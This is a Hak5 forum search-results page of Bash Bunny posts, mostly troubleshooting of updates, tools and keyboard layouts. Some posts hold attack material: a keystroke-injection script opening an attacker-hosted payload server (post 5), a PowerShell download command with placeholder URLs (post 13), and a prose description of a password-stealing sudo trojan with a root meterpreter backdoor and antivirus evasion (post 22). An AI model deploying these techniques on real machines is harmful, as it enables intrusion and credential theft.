Jump to content

Search the Community

Showing results for tags 'bash bunny'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 56 results

  1. Dear everyone, I am doing some experimenting with my new bash bunny and was wondering if once I enable an ATTACKMODE interface if it is possible to disable it after a little while without turning off the payload. For example I am trying ATTACKMODE HID STORAGE and then wondering if I can do something like DISABLE STORAGE or something of like that. I know to some of you this is probably going to seem like a stupid question but if anyone knows the answer can you please share. Thank you!!!
  2. I'm trying to install impacket and responder to my BB using the .deb files provided on another thread however, my bunny doesn't seem to recognise the updated tools folder. When I copy the files, eject and plug back in, it just boots as normal and doesn't copy anything to its /tools on its linux partition. I found a previous thread saying to delete the everything, change the version.txt file to an earlier version and run the updater but I don't wanna mess it up any more than it already is. I've tried restoring by inducing 3 failed boots to restore to factory but that hasn't seemed to work
  3. My first payload: Watch THE movie in the terminal LED ATTACK ATTACKMODE HID QUACK CTRL-ALT t sleep 1 QUACK STRING "telnet towel.blinkenlights.nl" QUACK ENTER LED FINISH ATTACKMODE OFF https://github.com/internetblacksmith/bunnywars
  4. Hi, I just bought my first Bash Bunny and tried to update it to 1.5 release. I read the docs about it, downloaded the updater and started it. Everything is going well, the download ends and the key blinks in red and blue. But once that's done, it becomes solid red and nothing else happens. My current version (version.txt): 1.3_267 I'm using Windows and don't have any other OS avalible right now. Thanks in advance for your your help, can't wait to use it!
  5. sub0

    [PAYLOAD] AutoPwn

    Hello, I had an idea for a sort of cross platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the targets user agent. This is only a PoC, nothing finalized at all but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript: DELAY 1000 ALT F2 DELAY 50 GUI SPACE GUI r DELAY 50 BACKSPACE DELAY 100 STRING http://10.10.0.53:8080/ ENTER This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with windows at all, been years since I used it (I'm a total linux nerd) so my powershell payload is probably terrible. I would welcome any and all improvements, ideas, etc. Thanks for reading! - sub0 autopwn.py
  6. I am quite new to the Bash Bunny and programming in general - I am literally a n00b, so any feedback or advice would be helpful. I am trying to create a payload that can potentially increase the number of switches which may be useful in particular environments such as when you don't have direct access to your own computer, specifically without using STORAGE. The way it works is the following: In the UDISK directory \payloads\, by default there are only two switches; with Nswitch, you can potentially have any number of switches (restricted by the storage of course); so in addition to the above directories, you can also create: Now switch1 is the Nswitch controller - the Nswitch can be changed in two ways, depending on whether you have a lockscreen or not. It is also able to detect the state of the lockscreen (which may be useful in other applications where you can set up two different attacks depending on the state) If there is no lockscreen - then the Bash Bunny will run a HTTP server, and you can set the switch number from http:\\172.16.64.1 directly. If there is a lockscreen - then the Bash Bunny will simply increase the value of N incrementally by 1, i.e each time you plug in the device N:=N+1. This also works if you don't have direct access to a computer, you can simply change the switch by repeatedly plugging it into a USB Power Bank (although this may take some time to reach switch6 as you would have to wait for the Bunny to boot up and the LEDs to flash and repeat this 6 times which isn't ideal in every situation) #!/bin/bash LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET TARGET_IP GET HOST_IP GET SWITCH_POSITION cd /root/udisk/payloads/$SWITCH_POSITION if [ -z "${TARGET_IP}" ]; then LED FAIL2 exit 1 fi if [ ! -f Nswitch.txt ]; then echo 0 > Nswitch.txt fi LED STAGE1 #Detecting lockscreen tcpdump -l -i usb0 'icmp and icmp[icmptype]=icmp-echo' -vv > ping & # Windows OS specific, can change to RUN OSX or RUN UNITY RUN WIN ping $HOST_IP -n 1 sleep 1 if grep "ICMP" ping > /dev/null then echo 1 > lockscreen # Unlocked LED G DOUBLE #Try Captive portal to overcome some restrictions? python -m SimpleHTTPServer 80 & while ! nc -z localhost 80; do sleep 0.2; done else echo 0 > lockscreen # Locked LED R DOUBLE N=0; for i in `cat Nswitch.txt`; do N=$((1 + $i)); done; echo $N > Nswitch.txt fi cp /root/udisk/payloads/switch$N /root/udisk/payloads/switch1 with <form name=”web_form” id=”web_form” method=”post” action=”post.php”> <p><label>Nswitch:</label><input type=”number” name=”N” id=”N” /></p> <input type="submit" value="Ammend"> </form> and <?php $N = $_POST[‘N’]; $fp = fopen(”Nswitch.txt”, “a”); $savestring = $N; fwrite($savestring); fclose($fp); ?> It still isn't complete yet but I have been able to detect the lockscreen state successfully. I did have some issues with the web server at first but this has been mostly resolved, I just need to finish off the code. Before I do, I thought I would get some advice from the Hak5 community on whether this payload would even be useful to other people, and how I could optimize the code or make it better.  I should mention, that once you set the switch number N it will automatically copy the files of the directory from \payloads\switchN to the other switch (i.e switch 2 in the example above) and once you unplug the Bunny, change the switch and replug it, it will run the payload from switch N on switch 2.
  7. I am quite new to the Bash Bunny and programming in general - I am literally a n00b, so any feedback or advice would be helpful. I am trying to create a payload that can potentially increase the number of switches which may be useful in particular environments such as when you don't have direct access to your own computer, specifically without using STORAGE. The way it works is the following: In the UDISK directory \payloads\, by default there are only two switches; with Nswitch, you can potentially have any number of switches (restricted by the storage of course); so in addition to the above directories, you can also create: Now switch1 is the Nswitch controller - the Nswitch can be changed in two ways, depending on whether you have a lockscreen or not. It is also able to detect the state of the lockscreen (which may be useful in other applications where you can set up two different attacks depending on the state) If there is no lockscreen - then the Bash Bunny will run a HTTP server, and you can set the switch number from http:\\172.16.64.1 directly. If there is a lockscreen - then the Bash Bunny will simply increase the value of N incrementally by 1, i.e each time you plug in the device N:=N+1. This also works if you don't have direct access to a computer, you can simply change the switch by repeatedly plugging it into a USB Power Bank (although this may take some time to reach switch6 as you would have to wait for the Bunny to boot up and the LEDs to flash and repeat this 6 times which isn't ideal in every situation) #!/bin/bash LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET TARGET_IP GET HOST_IP GET SWITCH_POSITION cd /root/udisk/payloads/$SWITCH_POSITION if [ -z "${TARGET_IP}" ]; then LED FAIL2 exit 1 fi if [ ! -f Nswitch.txt ]; then echo 0 > Nswitch.txt fi LED STAGE1 #Detecting lockscreen tcpdump -l -i usb0 'icmp and icmp[icmptype]=icmp-echo' -vv > ping & # Windows OS specific, can change to RUN OSX or RUN UNITY RUN WIN ping $HOST_IP -n 1 sleep 1 if grep "ICMP" ping > /dev/null then echo 1 > lockscreen # Unlocked LED G DOUBLE #Try Captive portal to overcome some restrictions? python -m SimpleHTTPServer 80 & while ! nc -z localhost 80; do sleep 0.2; done else echo 0 > lockscreen # Locked LED R DOUBLE N=0; for i in `cat Nswitch.txt`; do N=$((1 + $i)); done; echo $N > Nswitch.txt fi cp /root/udisk/payloads/switch$N /root/udisk/payloads/switch1 with <form name=”web_form” id=”web_form” method=”post” action=”post.php”> <p><label>Nswitch:</label><input type=”number” name=”N” id=”N” /></p> <input type="submit" value="Ammend"> </form> and <?php $N = $_POST[‘N’]; $fp = fopen(”Nswitch.txt”, “a”); $savestring = $N; fwrite($savestring); fclose($fp); ?> It still isn't complete yet but I have been able to detect the lockscreen state successfully. I did have some issues with the web server at first but this has been mostly resolved, I just need to finish off the code. Before I do, I thought I would get some advice from the Hak5 community on whether this payload would even be useful to other people, and how I could optimize the code or make it better.
  8. Not sure if this in the right place for this... What are the best defenses against this attack? I'm more interesting in logical controls that can be implemented to protect against this threat that physical ones.
  9. Hey guys, New to the forums, I have been playing with the bash bunny and so far I really think it rocks! One feature I would like to have is the option for a three device attack; HID, Mass Storage and RO Mass Storage. 1- HID for attack execution 2- Mass Storage for logging of attack result 3- RO Mass Storage for tools, such as installers etc Is this possible?
  10. Is there any way can i control winbox by bash bunny ? i don't know where the winbox is. 1si i need to search it than... control it.. by bash bunny .. can i do it ? with PowerShell or cmd ? Thanks :)
  11. Capsos

    No Loot

    Happy New Year All Been checking the updates with the auto updater and new payloads. Ive ran a few on a older laptop i use for training encase i Fook it up..... Well ive tried a few of them now and all the RGB flash to the correct sequence. I have tried it with the Laptop in locked and unlocked and neither time when i check i have a empty loot folder !! Any ideas ? I have tried disabling my Security protection just in case but still nothing ! Thanks in advance
  12. Hey all I have got a new Bashbunny and plugged it into a USB2 port in switch possion 1 and windows started to install Usb composite device READY CDC Serial NO DRIVER FOUND USB Mass Storage Device READY USB Device READY. Where can I find the CDC driver ?
  13. So I have been experimenting with my bash bunny and preparing it for a windows 7 powershell download file and execute. I am in a virtualbox so that may be the problem! So inside the powershell command I use () and : windows 7 cmd translates "(" to 9 and ")" to 0 and ":" to ; and all uppercase things are typed as lowercase. the command: Q STRING "powershell(new-object net.webclient).DownloadFile('xxx','xxx'); " Some more issues is that the URL am downloading has Uppercase characters which are not bring typed into the cmd. Thanks in advance and HACK THE PLANET ~~0x5a
  14. I tried updating my bashbunny to 1.4 today, and it was going well.. Then, after i ejected it and put it back in to start the update it started flashing a "police" pattern. I am back on version 1.0 and no matter what update i download, i am not able to go up. I would really like some help... I don't understand what is wrong.
  15. So ive been trying to run ducky script in a bash bunny payload but as soon as it hits the ducky script it stops. LED SETUP GET SWITCH_POSITION ATTACKMODE HID LED ATTACK RUN WIN notepad.exe QUACK DELAY 300 QUACK STRING (\___/) QUACK ENTER QUACK DELAY 300 QUACK STRING (='.'=) QUACK ENTER QUACK DELAY 300 QUACK STRING (")_(") QUACK DELAY 300 I cant figure out the problem
  16. hey hey:-) How do i correctly install the DuckyLibraryUpdate? when i copy the content of the DuckyLibraryUpdate folder to switch1 unplug safe switch to switch1 and plug in the LED goes off ... what am i doing wrong? do i need to copy the install.sh to another place ? I use it on macOS High Sierra and with a german keyboard layout... thank you for your help! cheers florian
  17. Hi folks, i have problems to get the bash bunny work on macOS High Sierra ! its possible to ssh into the bunny but i cant run apt update etc... i have followed the bunny wiki and installed squid ..it runs ....but when i want to apt update i get this output: root@bunny:~# apt update Err http://httpredir.debian.org jessie InRelease Err http://httpredir.debian.org jessie Release.gpg Could not resolve 'httpredir.debian.org' Reading package lists... Done Building dependency tree Reading state information... Done All packages are up to date. W: Failed to fetch http://httpredir.debian.org/debian/dists/jessie/InRelease W: Failed to fetch http://httpredir.debian.org/debian/dists/jessie/Release.gpg Could not resolve 'httpredir.debian.org' W: Some index files failed to download. They have been ignored, or old ones used instead. Any ideas ? Thanks so much Florian
  18. After following the guide for 'unblocking' my bash bunny, I have been unable to install any of the tools. I have verified the tools are not installed by looking in the tools folder on the lines side and using payloads that require specific tools like Responder. I've gone through the standard instructions for installing tools... put the bash dummy in arming mode, transfer the files into the 'tools' folder, safely eject, and reinsert while still in arming mode. When I do this, the bash bunny just boots like normal. The led never goes magenta and the files are still in the 'tools' folder. Any payload that requires a specific tool will fail. Thoughts? Suggestions? Any help would be appreciated.
  19. Hi Hak5 forums, i started to play around with some Bash Bunny payloads, and wanted to tweak the LED output which is shown during the execution of an payload. i searched around a bit, but couldn't find any listings of the LED options or commands to trigger them. Does anyone know all the LED options and the commands for them so that i could try them. or have an source where they are already listed. Cheers, D
  20. I want to create a couple of new keyboard layouts for the community. I downloaded USBlyzer, so that I could observe the key codes for all the keys on my keyboard. On Czech keyboard, some special characters need "special attention". For example, pipe character is not present, unless I press "leftCtrl+leftAlt+w". Once I do that, I can see the code in USBlyzer: 05 00 1a 00 00 00 00 00 So far so good. I went to /languages/us.json, made a copy, named it cz.json, and changed pipe line accordingly: "|":"05,00,1a" Then I created this simple payload.txt to see if it is pressed (I have Czech layout turned on) ATTACKMODE HID STORAGE DUCKY_LANG cz QUACK STRING bla\|aa When I tried this, I can only see "blaaa" string being shown, no pipe character is present. Note that when I change DUCK_LANG to "us" it works and writes pipe character as expected. Am I missing something, or Bash Bunny has some issues with running these commands?
  21. There are some keyboard layouts, which don't have special characters (e.g. Slovak or Czech) like pipe or backslash. Since such characters can't be single-pressed on keyboard, I was thinking about writing inside the QUACK file.txt file some specific code with ALT encoding, .e.g STRING command1 ALT 124 STRING command2 which would simply be written as command1 | command2 Unfortunately, I'm unable to write such ALT 124 key combination. Is this approach possible with Bash Bunny?
  22. Taking the idea (again, mad props to sudoBackdoor) a bit further with some python scripting, I scared myself (and unintentionally pwned myself a few times as well) with this thing. How it works: The user's .bash_profile or .bashrc gets tweaked to point to ~/.config/sudo A python script called sudo is installed there. [Patience is required here, as you need to wait for the user to sudo some command now] This will take their password, validate it by running its own sudo command (literally just echoing something) and seeing if it works Once it confirms a good password, it stores the password for later retrieval and executes the intended sudo command in a subshell that the user shouldn't even notice a difference in After executing their command, it will use the password to sudo open up a reverse https meterpreter session on the machine. It will do this every time sudo is run. I unintentionally self pwned a few times, because the meterpreter session is being run as root, and one must sudo kill to get rid of it. Sudo killing it will get rid of the existing session as expected, but then will open up a shiny new session as its last step (unless the python script is gone). Because antivirus tends to recognize the base64-encoded meterpreter payload as malicious, I also wrote a script called "shellSmuggler.py" to go with it. If you use the msfvenom command I supply here, you should be able to pipe the output to the shellSmuggler and scramble the payload enough that antivirus doesn't alert on/block it anymore. You will need to know your listening machine's IP and listening port (obviously).
  23. Guys I downloaded all the 3 tools in the forum but I don't know if they are installed or not and by the way non of the payloads are working
  24. Guys I just got my BB and I updated it to the latest firmware and I downloaded all the payloads but none of them works (more specifically they create an empty folder in "loots" with the name of the payload )... I assumed it was because I didn't have any tools.... so I downloaded all of the tools from the " hak5 forums" ... and in order for the tools to install I should unplug and plug my BB in arming mode again) but every time I open my " tools " folder in my BB it's empty ( despite I downloaded them several times) ...what is the problem?.... what should I do? PS ( I'm working with windows 10)
  25. Harllen Dias

    Tools

    boa tarde, estou com dificuldades para instalar as ferramentas o meu Bash bunny, copiei os arquivos .deb para tools mas não instala quando conecto em modo armamento os arquivos ainda estão lá, o Firmware v1.3 esta instalado. desculpe pelo ingles
×
×
  • Create New...